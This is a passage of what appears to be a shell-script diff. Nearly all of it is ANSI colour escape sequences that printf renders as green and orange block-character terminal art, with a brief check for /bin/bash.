\e[48;5;28m\e[38;5;76m▄\e[48;5;235m\e[38;5;76m▄\e[48;5;102m\e[38;5;236m▄\e[48;5;250m\e[38;5;235m▄\e[48;5;233m\e[38;5;232m▄\e[0m + \e[48;5;232m \e[48;5;237m \e[48;5;70m \e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;64m\e[38;5;76m▄\e[48;5;76m\e[38;5;64m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m \e[48;5;22m\e[38;5;76m▄\e[48;5;233m\e[38;5;76m▄\e[48;5;76m\e[38;5;233m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;28m\e[38;5;76m▄\e[48;5;76m \e[48;5;70m \e[48;5;236m \e[48;5;238m \e[48;5;236m\e[0m + \e[48;5;232m\e[38;5;236m▄\e[48;5;236m\e[38;5;233m▄\e[48;5;64m \e[48;5;76m \e[48;5;70m\e[38;5;76m▄\e[48;5;22m\e[38;5;76m▄\e[48;5;76m \e[38;5;64m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;70m▄\e[48;5;76m \e[48;5;233m\e[38;5;76m▄\e[48;5;70m\e[38;5;76m▄\e[48;5;76m \e[48;5;64m \e[48;5;236m \e[38;5;235m▄\e[0m + \e[48;5;71m \e[48;5;232m\e[38;5;65m▄\e[48;5;64m\e[38;5;233m▄\e[48;5;76m \e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;77m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m \e[48;5;0m\e[38;5;70m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;232m▄\e[48;5;0m\e[38;5;70m▄\e[48;5;76m \e[38;5;77m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;107m▄\e[48;5;76m\e[38;5;77m▄\e[48;5;76m \e[38;5;70m▄\e[48;5;236m \e[48;5;237m\e[38;5;238m▄\e[48;5;234m\e[38;5;235m▄\e[0m + \e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;64m\e[38;5;232m▄\e[48;5;76m \e[48;5;77m\e[38;5;76m▄\e[48;5;107m\e[38;5;77m▄\e[48;5;107m \e[38;5;77m▄\e[48;5;77m \e[48;5;76m \e[48;5;107m\e[38;5;77m▄\e[48;5;107m \e[48;5;71m\e[38;5;77m▄\e[48;5;76m \e[48;5;64m \e[48;5;236m\e[38;5;237m▄\e[48;5;237m\e[38;5;234m▄\e[0m + \e[48;5;71m \e[48;5;232m\e[38;5;239m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m \e[48;5;70m\e[38;5;64m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;238m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m + \e[48;5;71m \e[48;5;237m\e[38;5;71m▄\e[48;5;232m\e[38;5;235m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m \e[48;5;70m\e[38;5;236m▄\e[48;5;236m \e[48;5;237m\e[38;5;234m▄\e[48;5;235m\e[38;5;236m▄\e[0m + \e[48;5;71m\e[38;5;237m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[48;5;236m\e[38;5;71m▄\e[48;5;232m\e[38;5;65m▄\e[48;5;70m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m \e[38;5;22m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;70m\e[38;5;236m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;235m\e[38;5;238m▄\e[48;5;236m\e[38;5;235m▄\e[48;5;236m\e[38;5;233m▄\e[0m + \e[38;5;233m▀\e[48;5;71m\e[38;5;232m▄\e[48;5;71m \e[48;5;236m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;2m\e[38;5;235m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m \e[38;5;77m▄\e[48;5;76m\e[38;5;236m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;22m\e[38;5;238m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[0m + \e[48;5;65m\e[38;5;238m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m \e[48;5;235m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;232m\e[38;5;71m▄\e[48;5;233m\e[38;5;238m▄\e[48;5;65m\e[38;5;234m▄\e[48;5;70m\e[38;5;232m▄\e[48;5;77m\e[38;5;0m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;235m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;237m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;65m▄\e[48;5;76m\e[38;5;22m▄\e[48;5;76m\e[38;5;234m▄\e[48;5;76m\e[38;5;232m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;76m\e[38;5;0m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;237m\e[38;5;236m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;0m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;237m▄\e[0m + \e[38;5;232m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m \e[48;5;65m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;233m\e[38;5;71m▄\e[48;5;234m\e[38;5;71m▄\e[48;5;237m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;65m\e[38;5;71m▄\e[48;5;71m \e[38;5;237m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;234m▀\e[38;5;239m▀\e[0m + \e[38;5;234m▀\e[38;5;236m▀\e[48;5;71m\e[38;5;235m▄\e[48;5;71m\e[38;5;234m▄\e[48;5;71m\e[38;5;238m▄\e[48;5;71m\e[38;5;65m▄\e[48;5;71m \e[38;5;65m▄\e[48;5;71m\e[38;5;236m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;235m▄\e[48;5;65m\e[38;5;243m▄\e[0m\e[38;5;233m▀\e[38;5;235m▀\e[0m + \e[38;5;242m▀\e[38;5;233m▀\e[38;5;232m▀\e[38;5;234m▀\e[38;5;236m▀\e[48;5;65m\e[38;5;236m▄\e[48;5;65m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;232m▄\e[48;5;71m\e[38;5;233m▄\e[48;5;65m\e[38;5;237m▄\e[48;5;237m\e[38;5;8m▄\e[0m\e[38;5;234m▀\e[38;5;232m▀\e[38;5;232m▀\e[38;5;59m▀\e[0m +'"; else if [ -f "/bin/bash" ]; then - /bin/bash -c "printf ' - \e[48;2;194;194;194m\e[38;2;26;43;21m▄\e[48;2;159;158;159m\e[38;2;58;91;50m▄\e[48;2;130;130;130m\e[38;2;68;119;56m▄\e[48;2;116;117;116m\e[38;2;86;143;70m▄\e[48;2;98;98;98m\e[38;2;100;153;87m▄\e[48;2;63;65;63m\e[38;2;102;164;86m▄\e[48;2;46;49;44m\e[38;2;98;168;79m▄\e[48;2;43;45;43m\e[38;2;91;155;75m▄\e[48;2;61;62;61m\e[38;2;78;137;63m▄\e[48;2;102;101;102m\e[38;2;64;112;52m▄\e[48;2;134;134;134m\e[38;2;38;67;32m▄\e[48;2;164;164;164m\e[38;2;20;35;16m▄\e[48;2;188;187;188m\e[38;2;10;20;8m▄\e[48;2;223;223;223m\e[38;2;15;21;13m▄\e[0m - \e[48;2;230;230;230m\e[38;2;49;80;41m▄\e[48;2;132;132;133m\e[38;2;73;133;59m▄\e[48;2;20;21;20m\e[38;2;91;163;72m▄\e[48;2;14;27;12m\e[38;2;96;174;76m▄\e[48;2;51;92;41m\e[38;2;98;177;78m▄\e[48;2;86;155;68m\e[38;2;98;177;78m▄\e[48;2;96;173;77m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;178;78m\e[38;2;98;177;78m▄\e[48;2;97;175;76m\e[38;2;98;177;78m▄\e[48;2;93;168;74m\e[38;2;98;177;78m▄\e[48;2;99;163;83m\e[38;2;97;177;77m▄\e[48;2;99;151;86m\e[38;2;98;177;78m▄\e[48;2;35;57;29m\e[38;2;98;176;78m▄\e[48;2;19;21;19m\e[38;2;94;169;75m▄\e[48;2;118;118;118m\e[38;2;70;125;56m▄\e[48;2;234;234;234m\e[38;2;30;45;26m▄\e[0m - \e[48;2;216;216;216m\e[38;2;42;65;36m▄\e[48;2;159;159;159m\e[38;2;62;106;52m▄\e[48;2;94;95;94m\e[38;2;86;152;70m▄\e[48;2;57;72;53m\e[38;2;96;174;77m▄\e[48;2;57;96;47m\e[38;2;98;177;78m▄\e[48;2;78;136;62m\e[38;2;98;177;78m▄\e[48;2;95;167;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;77m▄\e[48;2;98;177;78m\e[38;2;91;165;72m▄\e[48;2;98;177;78m\e[38;2;76;137;60m▄\e[48;2;98;177;78m\e[38;2;54;97;42m▄\e[48;2;99;179;79m\e[38;2;39;71;30m▄\e[48;2;100;181;79m\e[38;2;35;60;30m▄\e[48;2;101;181;81m\e[38;2;42;66;37m▄\e[48;2;100;177;80m\e[38;2;52;73;45m▄\e[48;2;95;175;76m\e[38;2;47;75;40m▄\e[48;2;94;178;73m\e[38;2;41;75;33m▄\e[48;2;98;179;78m\e[38;2;42;73;34m▄\e[48;2;99;180;79m\e[38;2;40;70;33m▄\e[48;2;99;179;78m\e[38;2;44;75;36m▄\e[48;2;97;177;77m\e[38;2;55;93;46m▄\e[48;2;97;176;77m\e[38;2;65;113;52m▄\e[48;2;98;177;78m\e[38;2;79;141;63m▄\e[48;2;98;177;78m\e[38;2;93;166;75m▄\e[48;2;98;177;78m\e[38;2;99;177;79m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m\e[38;2;97;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;94;170;75m\e[38;2;98;177;78m▄\e[48;2;71;128;56m\e[38;2;98;177;78m▄\e[48;2;34;56;28m\e[38;2;97;175;77m▄\e[48;2;64;66;64m\e[38;2;78;140;62m▄\e[48;2;161;161;161m\e[38;2;48;84;39m▄\e[0m - \e[48;2;66;112;54m\e[38;2;98;177;78m▄\e[48;2;80;133;66m\e[38;2;98;177;78m▄\e[48;2;95;162;76m\e[38;2;98;177;78m▄\e[48;2;96;171;76m\e[38;2;98;177;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[48;2;91;91;91m\e[38;2;99;149;87m▄\e[48;2;188;188;188m\e[38;2;39;53;36m▄\e[0m - \e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m - \e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m - \e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m \e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m - \e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m \e[0m - \e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m - \e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m - \e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m - \e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m 